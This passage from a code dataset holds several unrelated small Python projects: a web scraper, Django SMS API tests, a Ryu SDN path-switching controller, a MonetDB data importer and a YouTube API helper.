print(result)\n","repo_name":"AntonBelski/leetcode_puzzles","sub_path":"0035_search_insert_position.py","file_name":"0035_search_insert_position.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38307356892","text":"# -*- coding: utf-8 -*-\nimport time\n#使用时间套件\nfrom bs4 import BeautifulSoup\n#使用BeauitfulSoup\n\nnow_data = time.strftime(\"%Y/%m/%d\")\nnow_time = time.strftime(\"%H:%M:%S\")\nnow = now_data + ' ' + now_time\n#取出今天日期、时间,并整成变数now\n\nurl0 = 'https://www.momoshop.com.tw/goods/GoodsDetail.jsp?i_code=4999052&str_category_code=2001000056&mdiv=2001000056&Area=DgrpCategory'\n\n\nfrom selenium import webdriver\n\ndriver = webdriver.PhantomJS(executable_path=r'C:\\Users\\IMITA-PC-13\\Desktop\\phantomjs-2.1.1-windows\\bin\\phantomjs') # PhantomJs\ndriver.get(url0) # 输入网址,交给浏览器 \npageSource = driver.page_source # 取得网页源代码\n#print(pageSource)\n\nsoup = BeautifulSoup(pageSource,\"lxml\")\n#将资料用lxml装起来放置到soup\n\ndriver.quit() # 关闭浏览器\n\n#以下是取出需要的资料------------------以下是第二阶段\nimages = 'img.jqzoom'\n#介绍图片\ntitle = 'div.prdnoteArea h1'\n#标题 *div.class名称为product_introduction 里面的h3\nsintro = 'ul#categoryActivityInfo' \n#小介绍\noriginal_price = 'ul.prdPrice del'\n#原价\nspecial_price = 'li.special'\n#促销价格\nintro = 'iframe#ifrmGoods'\n#主介绍\nspecification = 'div.attributesArea table'\n#规格\n\n#资料转换区\nimages0 = soup.select(images)\ntitle0 = soup.select(title)\nsintro0 = soup.select(sintro)\noriginal_price0 = soup.select(original_price)\nspecial_price0 = soup.select(special_price)\nintro0 = soup.select(intro)\nspecification0 = soup.select(specification)\n\nprint('标题:' , images0)#资料已经干净\nprint('标题:' , title0[0].text)#资料已经干净\nprint('小介绍:' , sintro0[0].text)#仍有问题\nprint('原价:' , original_price0[0].text)#资料已经干净\nprint('特价:' , special_price[0].text.rstrip().strip())#抓取到了\nprint('主介绍:' , intro0)#有点问题*******************\nprint('规格:' , specification0[0])#呈现源代码\n\nprint('资料抓取日期:' + now)","repo_name":"ts00189145/python","sub_path":"[等待加入for迴圈]單一頁面抓取/momoshop.py","file_name":"momoshop.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12188804668","text":"from unittest.mock import patch\nfrom rest_framework import status\nfrom rest_framework.test import force_authenticate\n\nfrom .base_tests import BaseTest\nfrom api.sms import views, models\nfrom . import dummy_data\n\n\nclass SMSRequestViewsTest(BaseTest):\n \"\"\"Test SMS request creation list and deletion\"\"\"\n @patch(\"api.sms.serializers.send_sms\")\n def test_sms_request_creation_succeeds(self, _):\n \"\"\"Test that sms creation with correct data will be successful\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.valid_sms_data)\n force_authenticate(request, self.user)\n response = views.SMSRequestView.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n \n def test_create_sms_request_fails_with_no_group_or_recepients_fails(self):\n \"\"\"Test that sms creation without group or receipient will fail\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.data_without_recepient_or_group)\n force_authenticate(request, self.user)\n response = views.SMSRequestView.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data['detail'], \"A receipient group id or a recepient contact list must be provided\")\n\n @patch(\"api.sms.serializers.send_sms\")\n def test_create_sms_request_with_both_group_or_recepients_succeeds(self, _):\n \"\"\"Test that sms creation with both group or receipient will succeed\"\"\"\n dummy_data.data_with_both_recepient_or_group[\"groups\"] = [self.group_id]\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.data_with_both_recepient_or_group)\n force_authenticate(request, self.user)\n instance = models.GroupMember(phone=self.user.phone, company=self.user.company)\n instance.save()\n self.group_instance.members.add(instance)\n self.group_instance.save()\n response = views.SMSRequestView.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n @patch(\"api.sms.serializers.send_sms\")\n def test_get_sms_requests_succeeds(self, _):\n \"\"\"Test that get created sms succeed\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.valid_sms_data)\n get_request = self.request_factory.get(self.create_list_sms_url)\n force_authenticate(request, self.user)\n force_authenticate(get_request, self.user)\n views.SMSRequestView.as_view()(request)\n response = views.SMSRequestView.as_view()(get_request)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual((response.data)['results'][0][\"message\"], dummy_data.valid_sms_data[\"message\"])\n\n @patch(\"api.sms.serializers.send_sms\")\n def test_delete_sms_requests_valid_data_succeeds(self, _):\n \"\"\"Test that delete created sms succeed\"\"\"\n instance = models.SMSRequest(company=self.user.company, recepients=[\"+254726406733\"], message=\"Come\")\n instance.save()\n id = instance.pk\n delete_request = self.request_factory.delete(self.create_list_sms_url, {\"message_requests\": [id]})\n force_authenticate(delete_request, self.user)\n response = views.SMSRequestView.as_view()(delete_request)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_delete_sms_requests_non_existent_id_fails(self):\n \"\"\"Test that delete sms requests with non-existent id fails\"\"\"\n delete_request = self.request_factory.delete(self.create_list_sms_url, {\n \"message_requests\": [100]\n })\n force_authenticate(delete_request, self.user)\n response = views.SMSRequestView.as_view()(delete_request)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"message_requests\"][0], ['Invalid pk \"100\" - object does not exist.'])\n\n def test_create_brand_name_succeeds(self):\n \"\"\"Test that brand name is created with correct data\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, {\n \"name\": \"Branded\"\n })\n \n force_authenticate(request, self.user)\n response = views.CreateBrandName.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_list_brand_names_succeeds(self):\n \"\"\"Test list brand name request \"\"\"\n request = self.request_factory.get(self.create_list_sms_url)\n self.user.is_superuser = True\n self.user.save()\n instance = models.SMSBranding.objects.create(name=\"create\", company=self.user.company)\n force_authenticate(request, self.user)\n response = views.ListBrandNameRequests.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"results\"][0][\"id\"], instance.pk)\n\n def test_edit_brand_names_succeeds(self):\n \"\"\"Test edit brand name request\"\"\"\n request = self.request_factory.patch(self.create_list_sms_url, {\"is_approved\": True})\n self.user.is_superuser = True\n self.user.save()\n instance = models.SMSBranding.objects.create(name=\"create\", company=self.user.company)\n force_authenticate(request, self.user)\n response = views.EditBrandNameRequests.as_view()(request, pk=instance.pk)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"is_approved\"], True)\n","repo_name":"ElMonstro/SMSPlatform","sub_path":"tests/api/sms/test_sms_views.py","file_name":"test_sms_views.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"18431845523","text":"from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ether_types\nfrom ryu.lib.packet import ipv4\nfrom ryu.lib.packet import tcp\nfrom ryu.lib.packet import icmp\nfrom ryu import cfg\nfrom ryu.lib import hub\nimport time\n\nclass SimpleSwitch13(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch13, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n self.ingress_icmp_rule_installed = False\n self.datapaths = {}\n self.flow_datapaths ={}\n self.monitor_thread = hub.spawn(self._monitor)\n self.prev_sec=0\n self.prev_nsec = 0\n self.prev_bytes = 0\n self.traffic_bw = 0\n self.installed_flows={}\n self.am_deleting=0\n\n CONF = cfg.CONF\n CONF.register_opts([\n cfg.IntOpt('bandwidth', default=500000, help = ('Bandwidth threshold'))])\n\n self.thbandwidth = CONF.bandwidth\n self.selected_path = 1\n print('bandwidth = {}'.format(CONF.bandwidth))\n\n def _monitor(self):\n while True:\n for dp in self.datapaths.values():\n self._request_stats(dp)\n hub.sleep(1)\n\n def _request_stats(self, datapath):\n print('send stats request: {}'.format(datapath.id) )\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)\n\n #req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n #datapath.send_msg(req)\n\n @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n def _flow_stats_reply_handler(self, ev):\n body = ev.msg.body\n\n \n self.logger.info('datapath '\n 'in-port '\n 'out-port packets bytes sec bw nsec')\n self.logger.info('---------------- '\n '-------- '\n '-------- -------- -------- -------- -------- -----------')\n\n \n \n for stat in sorted([flow for flow in body if flow.priority == 1],\n key=lambda flow: (flow.match['in_port'])):\n\n self.logger.info('%016x %17s %8x %8d %8d %8d %8d %d',\n ev.msg.datapath.id,\n stat.match['in_port'], \n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count, stat.duration_sec, 0, stat.duration_nsec)\n\n bw=0\n if self.prev_bytes==0:\n self.prev_bytes=stat.byte_count\n self.prev_sec=stat.duration_sec\n self.prev_nsec=stat.duration_nsec\n elif stat.byte_count==self.prev_bytes:\n self.traffic_bw=0\n elif stat.byte_count>self.prev_bytes:\n interval_sec=(stat.duration_sec-self.prev_sec)+(stat.duration_nsec-self.prev_nsec)/1e9\n if interval_sec>0:\n bw=(stat.byte_count-self.prev_bytes)*8.0/interval_sec\n bwkb=bw/1000\n path=1\n if bwkb>self.thbandwidth:\n path=2\n\n print(\"bwkb={}, th={}, path={}, selected={}\".format(bwkb, self.thbandwidth, path, self.selected_path))\n\n if path!=self.selected_path:\n print(\"---------------PATH TO BE UPDATED-----------\")\n self.selected_path=path\n self.am_deleting=1\n self.clear_flows()\n self.am_deleting=0\n self.mac_to_port = {}\n self.update_flows()\n \n if bw>self.traffic_bw:\n self.traffic_bw=bw\n #print(\"byte, prev_byte={}, {}\".format(stat.byte_count,self.prev_bytes))\n self.prev_bytes=stat.byte_count\n self.prev_sec=stat.duration_sec\n self.prev_nsec=stat.duration_nsec\n \n \n \n\n def update_flows(self):\n for dp in self.installed_flows:\n datapath=self.installed_flows[dp]\n if self.selected_path==1:\n if dp in [2,3]:\n self.add_flow_p(datapath, 1, 1, 2)\n self.add_flow_p(datapath, 1, 2, 1)\n \n elif datapath.id in [1,6]:\n self.add_flow_p(datapath, 1, 1, 3)\n self.add_flow_p(datapath, 1, 3, 1)\n \n elif self.selected_path==2:\n if dp in [4,5]:\n self.add_flow_p(datapath, 1, 1, 2)\n self.add_flow_p(datapath, 1, 2, 1)\n \n elif datapath.id in [1,6]:\n self.add_flow_p(datapath, 1, 2, 3)\n self.add_flow_p(datapath, 1, 3, 2)\n \n\n #self.add_flow_p(self.installed_flows[dp], 1, self.selected_path, 3)\n #self.add_flow_p(self.installed_flows[dp], 1, 3, self.selected_path)\n\n @set_ev_cls(ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n self.installed_flows[datapath.id]=datapath\n print(\"state_change_handler: datapath={}\".format(datapath.id))\n if ev.state == MAIN_DISPATCHER:\n if datapath.id not in self.datapaths:\n self.logger.debug('register datapath: %016x', datapath.id)\n \n if datapath.id in [2,3]:\n self.add_flow_p(datapath, 1, 1, 2)\n self.add_flow_p(datapath, 1, 2, 1)\n \n elif datapath.id in [1,6]:\n self.add_flow_p(datapath, 1, 1, 3)\n self.add_flow_p(datapath, 1, 3, 1)\n \n if datapath.id==1:\n self.datapaths[datapath.id] = datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.debug('unregister datapath: %016x', datapath.id)\n del self.datapaths[datapath.id]\n \n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n print(\"feature_handler: datapath={}\".format(datapath))\n\n # install table-miss flow entry\n #\n # We specify NO BUFFER to max_len of the output action due to\n # OVS bug. At this moment, if we specify a lesser number, e.g.,\n # 128, OVS will send Packet-In with invalid buffer_id and\n # truncated packet data. In that case, we cannot output packets\n # correctly. The bug has been fixed in OVS v2.1.0.\n match = parser.OFPMatch()\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions)\n\n @set_ev_cls(ofp_event.EventOFPFlowRemoved, MAIN_DISPATCHER)\n def flow_removed_handler(self, ev):\n msg = ev.msg\n dp = msg.datapath\n ofp = dp.ofproto\n\n if msg.reason == ofp.OFPRR_IDLE_TIMEOUT:\n reason = 'IDLE TIMEOUT'\n elif msg.reason == ofp.OFPRR_HARD_TIMEOUT:\n reason = 'HARD TIMEOUT'\n elif msg.reason == ofp.OFPRR_DELETE:\n reason = 'DELETE'\n elif msg.reason == ofp.OFPRR_GROUP_DELETE:\n reason = 'GROUP DELETE'\n else:\n reason = 'unknown'\n\n #print(\"\\n\\n===FLOW REMOVED===\\n\\n\")\n if dp.id==1:\n self.prev_sec=0\n self.prev_nsec = 0\n self.prev_bytes = 0\n self.traffic_bw = 0\n '''\n self.logger.info('OFPFlowRemoved received: '\n 'cookie=%d priority=%d reason=%s table_id=%d '\n 'duration_sec=%d duration_nsec=%d '\n 'idle_timeout=%d hard_timeout=%d '\n 'packet_count=%d byte_count=%d match.fields=%s',\n msg.cookie, msg.priority, reason, msg.table_id,\n msg.duration_sec, msg.duration_nsec,\n msg.idle_timeout, msg.hard_timeout,\n msg.packet_count, msg.byte_count, msg.match)\n '''\n \n def del_flow(self, datapath):\n print(\"Deleting flow for S{}\".format(datapath.id))\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n match = parser.OFPMatch(in_port=1, eth_src=1, eth_dst=2)\n\n mod = parser.OFPFlowMod(datapath=datapath, command=ofproto.OFPFC_DELETE, \n cookie=1, cookie_mask=0xFFFFFFFFFFFFFFFF,\n table_id=ofproto.OFPTT_ALL,\n out_port=ofproto.OFPP_ANY,\n out_group=ofproto.OFPG_ANY)\n \n datapath.send_msg(mod)\n\n def clear_flows(self):\n dpl=[]\n if self.selected_path==1:\n dpl=[1,2,3,6]\n else:\n dpl=[1,4,5,6]\n for dp in self.installed_flows:\n self.del_flow(self.installed_flows[dp])\n \n #self.installed_flows={}\n\n\n def add_flow_p(self, datapath, priority, in_port, out_port):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n actions = [parser.OFPActionOutput(out_port)]\n match = parser.OFPMatch(in_port=in_port)\n self.add_flow(datapath, priority, match, actions, flags=ofproto.OFPFF_SEND_FLOW_REM, cookie=1)\n \n def add_flow(self, datapath, priority, match, actions, idle_timeout=0, hard_timeout=0, flags=0, cookie=0, buffer_id=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(cookie=cookie, datapath=datapath, buffer_id=buffer_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout, flags=flags,\n priority=priority, match=match,\n instructions=inst)\n else:\n mod = parser.OFPFlowMod(cookie=cookie, datapath=datapath, priority=priority, idle_timeout=idle_timeout, hard_timeout=hard_timeout, flags=flags,\n match=match, instructions=inst)\n datapath.send_msg(mod)\n\n '''\n def create_icmp_request(self, datapath, pkt_ethernet, pkt_ipv4):\n\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=pkt_ethernet.ethertype,\n dst=pkt_ethernet.src,\t\t#ping source of TCP SYN\n src=pkt_ethernet.dst))\n print \"Creating ICMP. Dest={}, Src={}\".format(pkt_ethernet.src, pkt_ethernet.dst)\n pkt.add_protocol(ipv4.ipv4(dst=pkt_ipv4.src,\n src=pkt_ipv4.dst,\n proto=1))\n print \"Creating ICMP. Dest={}, Src={}, proto={}\".format(pkt_ipv4.src, pkt_ipv4.dst, 1)\n\trtt_info=str(pkt_ipv4.src)+\",\"+str(time.time())\n pkt.add_protocol(icmp.icmp(type_=icmp.ICMP_ECHO_REQUEST,\n code=0,\t\t\t\t\t\n csum=0,\n data=icmp.echo(1,1,bytearray(rtt_info))))\n\n pkt_dest = packet.Packet()\n pkt_dest.add_protocol(ethernet.ethernet(ethertype=pkt_ethernet.ethertype,\n dst=pkt_ethernet.dst,\t\t#ping destination of TCP SYN\n src=pkt_ethernet.src))\n print \"Creating ICMP. Dest={}, Src={}\".format(pkt_ethernet.dst, pkt_ethernet.src)\n pkt_dest.add_protocol(ipv4.ipv4(dst=pkt_ipv4.dst,\n src=pkt_ipv4.src,\n proto=1))\n print \"Creating ICMP. Dest={}, Src={}, proto={}\".format(pkt_ipv4.dst, pkt_ipv4.src, 1)\n\trtt_info_dest=str(pkt_ipv4.dst)+\",\"+str(time.time())\n pkt_dest.add_protocol(icmp.icmp(type_=icmp.ICMP_ECHO_REQUEST,\n code=0,\t\t\t\t\t\n csum=0,\n data=icmp.echo(1,1,bytearray(rtt_info_dest))))\n\n\n return [pkt, pkt_dest] \n\n def send_icmp(self, datapath, in_port, out_port, pkt_ethernet, pkt_ipv4):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n [icmp_pkt, icmp_pkt_dest] = self.create_icmp_request(datapath, pkt_ethernet, pkt_ipv4)\n icmp_pkt.serialize()\n data=icmp_pkt.data\n\n actions = [parser.OFPActionOutput(port=out_port)]\n print \"Sending ICMP. In={} Out={}\".format(out_port, in_port)\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=in_port, actions=actions, data=data)\n success=datapath.send_msg(out)\n print \"icmp packet out={}\".format(success)\n\n icmp_pkt_dest.serialize()\n data=icmp_pkt_dest.data\n\n actions = [parser.OFPActionOutput(port=in_port)]\n print \"Sending ICMP. In={} Out={}\".format(in_port, out_port)\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=out_port, actions=actions, data=data)\n success=datapath.send_msg(out)\n print \"icmp packet out={}\".format(success)\n\n '''\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n return\n # If you hit this you might want to increase\n # the \"miss_send_length\" of your switch\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n\n \n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n \n '''\n elif eth.ethertype == ether_types.ETH_TYPE_IP: \n ipp = pkt.get_protocol(ipv4.ipv4)\n print \"IP packet. Source={} Destination={} Protocol={}\".format(ipp.src, ipp.dst, ipp.proto)\n\n if ipp.proto == 6:\n tcpp = pkt.get_protocol(tcp.tcp)\n if tcpp.has_flags(tcp.TCP_SYN):\n print \"SYN Received from {} at {}\".format(ipp.src, datapath.id)\n if self.ingress_icmp_rule_installed==False:\n actions_controller_icmp = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER)]\n match_icmp = parser.OFPMatch(eth_type=0x0800,ip_proto=1)\n self.add_flow(datapath, 3, match_icmp, actions_controller_icmp)\n self.ingress_icmp_rule_installed = True\n out_port = self.mac_to_port[datapath.id][eth.dst]\n self.send_icmp(datapath, out_port, in_port, eth, ipp)#in_port, out_port\n elif ipp.proto == 1:\n if self.ingress_icmp_rule_installed==True:\n icmpp = pkt.get_protocol(icmp.icmp)\n rtt_info=str(icmpp.data.data)\n rtt_info_fields=rtt_info.split(\",\")\n rtt=time.time()-float(rtt_info_fields[1])\n print \"RTT calculated. Target = {}, send_time = {}, rtt={}ms\".format(rtt_info_fields[0], rtt_info_fields[1], rtt*1000)\n return\n '''\n\n if self.am_deleting==1:\n return\n\n dst = eth.dst\n src = eth.src\n\n dpid = datapath.id\n\n if dpid in [1,6] and in_port==3-self.selected_path:\n #print(\"ignoring packet\")\n return\n \n self.mac_to_port.setdefault(dpid, {})\n\n #self.logger.info(\"packet in %s %s %s %s\", dpid, src, dst, in_port)\n\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n actions_controller = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER)]\n #match_tcp = parser.OFPMatch(eth_type=0x0800,ip_proto=6)\n\n #print(\"====PACKETIN RECEIVED===== {}, {}, {}\".format(datapath.id, src, dst))\n \n # install a flow to avoid packet_in next time\n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst, eth_src=src)\n\n #self.add_flow(datapath, 2, match_tcp, actions_controller)\n\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n idle_=0\n hard_=0\n if msg.buffer_id != ofproto.OFP_NO_BUFFER:\n self.add_flow(datapath, 1, match, actions, msg.buffer_id, idle_timeout=idle_, hard_timeout=hard_, flags=ofproto.OFPFF_SEND_FLOW_REM, cookie=1)\n return\n else:\n self.add_flow(datapath, 1, match, actions, idle_timeout=idle_, hard_timeout=hard_, flags=ofproto.OFPFF_SEND_FLOW_REM, cookie=1)\n\n if datapath.id not in self.installed_flows:\n self.installed_flows[datapath.id]=[]\n\n self.installed_flows[datapath.id]=datapath\n\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n success=datapath.send_msg(out)\n #print(\"Flow rule installed successfully = {}\".format(success))\n","repo_name":"kubad565/sdn-project","sub_path":"automatic.py","file_name":"automatic.py","file_ext":"py","file_size_in_byte":18607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"37128023404","text":"#!/usr/bin/env python3\n\n\ndef close(x, y, z):\n dif = abs(x-y)\n if dif < z:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n a = close(1, 2, 0.5)\n print(a)\n b = close(1, 2, 3)\n print(b)\n\n\n\n","repo_name":"hayc09/automatic-engine","sub_path":"Lab1/close.py","file_name":"close.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74335688057","text":"from django.urls import path, include\n\nfrom main import views\nfrom main.views import ProductDetailsView, ProductsListView, CreateProductView, UpdateProductView, DeleteProductView, \\\n SearchResultsView\n\nurlpatterns = [\n path('search/', SearchResultsView.as_view(), name='search-results'),\n path('create/', CreateProductView.as_view(), name='create-product'),\n path('<slug:category_id>/', ProductsListView.as_view(), name='products-list'),\n path('details/<int:pk>/', ProductDetailsView.as_view(), name='product-details'),\n path('update/<int:pk>/', UpdateProductView.as_view(), name='update-product'),\n path('delete/<int:pk>/', DeleteProductView.as_view(), name='delete-product'),\n\n\n]","repo_name":"TimJo94/shop","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12012475166","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFunc:\n- Connect MonetDB Database, using the default 'demo'\n- Import Data.\n\nRef:\nhttps://www.monetdb.org/Documentation/ClientInterfaces/PythonLibrary\nhttps://pymonetdb.readthedocs.io/en/latest/\n\nUsage:\n> python monetdb.py --input=YOUR DATA PATH --tbname='YOUR TABLE NAME'\ne.g.,\n> python monetdb.py --input=../data/bim/SciThe/classmodel.xyz --tbname=SciThe \n\n@date: June 25, 2020\n@author: Wesley\n\n\"\"\"\n\n# Import necessary packages and modules.\nfrom __future__ import print_function\nfrom __future__ import division\nimport os\nimport sys\nimport argparse\nimport pymonetdb\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom platform import python_version\n\nprint('Python Version: ', python_version())\n\n\ndef create_db(tbname):\n\t'''\n\t'''\n\tconn = None\n\ttry:\n\t\t# print('Connecting to the MonetDB database ...')\n\t\t# set up a connection. arguments below are the defaults\n\t\tconn = pymonetdb.connect(username=\"monetdb\", password=\"monetdb\", hostname=\"localhost\", database=\"demo\")\n\t\t# create a cursor\n\t\tcur = conn.cursor()\n\t\t# create a table\n\t\tcur.execute('CREATE TABLE IF NOT EXISTS '+ tbname + \n\t\t\t' (voxid SERIAL, x INTEGER NOT NULL, y INTEGER NOT NULL, z INTEGER NOT NULL, objID INTEGER);')\n\n\t\t# close connection\n\t\tcur.close()\n\t\tconn.commit()\n\texcept (Exception, pymonetdb.exceptions.DatabaseError) as error:\n\t\tprint(error)\n\tfinally:\n\t\treturn conn\n\n\ndef write_db(conn, tbname, file):\n\t'''\n\t'''\n\tif conn is not None:\n\t\ttry:\n\t\t\tcur = conn.cursor()\n\t\t\t# Method-I: Read .xyz file line by line\n\t\t\t'''\n\t\t\twith open(file, mode='r', encoding='utf-8') as f:\n\t\t\t\twhile(True):\n\t\t\t\t\tline = f.readline().strip()\n\t\t\t\t\tif not line:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tx, y, z = int(line.split()[0]), int(line.split()[1]), int(line.split()[2])\n\t\t\t\t\tobjID = int(line.split()[3])\n\t\t\t\t\tcur.execute(\"INSERT INTO \" + tbname + \n\t\t\t\t\t\t\" (x, y, z, objID) VALUES({0}, {1}, {2}, {3})\".format(\n\t\t\t\t\t\t\tint(x), int(y), int(z), int(objID)))\n\t\t\t'''\n\t\t\t# Method-II: COPY -- copy data between a file and a table\n\t\t\tcur.execute(\"COPY INTO \" + tbname + \"(x, y, z, objID) FROM '\" + file + \"'(x,y,z,objID) DELIMITERS ' ';\")\n\n\t\t\tcur.close()\n\t\t\tconn.commit()\n\t\texcept (Exception, pymonetdb.exceptions.DatabaseError) as error:\n\t\t\tprint(error)\n\t\tfinally:\n\t\t\tconn.close()\n\t\t\tprint('Database connection closed.')\n\n\nif __name__ == '__main__':\n\tprint('********** Initializing ArgumentParser and related arguments **********')\n\tparser = argparse.ArgumentParser(description='Argument list', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--input', help='directory for input data')\n\tparser.add_argument('--tbname', help='table name')\n\targs = parser.parse_args(sys.argv[1:])\n\n\tprint('********** Creating Database **********')\n\tconn = create_db(args.tbname)\n\n\tprint('********** Writing Database **********')\n\twrite_db(conn, args.tbname, args.input)\n\n","repo_name":"weil0819/Vox3DMod","sub_path":"src/monetdb.py","file_name":"monetdb.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24273774835","text":"import googleapiclient.discovery\nfrom TransferObjects import PlaylistData\nimport ExceptionPackage.TimeOutCustomException as excepCust\nimport requests\nfrom io import BytesIO\nimport url_parser\n\nclass YoutubeAPI:\n\n def getYoutubeObject(self):\n DEVELOPER_KEY = \"\"\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\n YOUTUBE_API_VERSION = \"v3\"\n return googleapiclient.discovery.build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\n developerKey=DEVELOPER_KEY)\n\n def getVideoId(self, url):\n url_data = url_parser.parse_url(url)\n print('url_data:',url_data)\n try:\n return url_data['query']['v']\n except KeyError:\n raise excepCust.Invalid_Url()\n\n def getRespFromAPIVideosList(self,videoId):\n print(\"In getRespFromAPIVideosList method. Input videoId = {}\".format(videoId))\n request = self.getYoutubeObject().videos().list(part=\"snippet,contentDetails,statistics\", id=videoId)\n response = request.execute()\n print(\"response ::\", response)\n\n return response\n\n def getVideoTileAndThumbnail(self, urlInput):\n video_id = self.getVideoId(urlInput)\n response = self.getRespFromAPIVideosList(video_id)\n try:\n totalResultCount = int(response['pageInfo']['resultsPerPage'])\n if totalResultCount == 0:\n raise excepCust.Invalid_Url()\n else:\n title = response['items'][0]['snippet']['title']\n videoInfo = PlaylistData.VideoInfo(title,urlInput)\n return videoInfo\n except excepCust.Invalid_Url:\n raise excepCust.Invalid_Url()\n except Exception:\n raise excepCust.GeneralException()\n\nyouTube = YoutubeAPI()\nyouTube.getYoutubeObject()\n","repo_name":"sayanam/TimeoutApplication","sub_path":"ServiceLayer/YoutubeAPI.py","file_name":"YoutubeAPI.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"44691703447","text":"import jinja2\n\nfrom app.helper import file_helper\nfrom google.appengine.api import memcache\n\ndef load(name, data={}):\n # 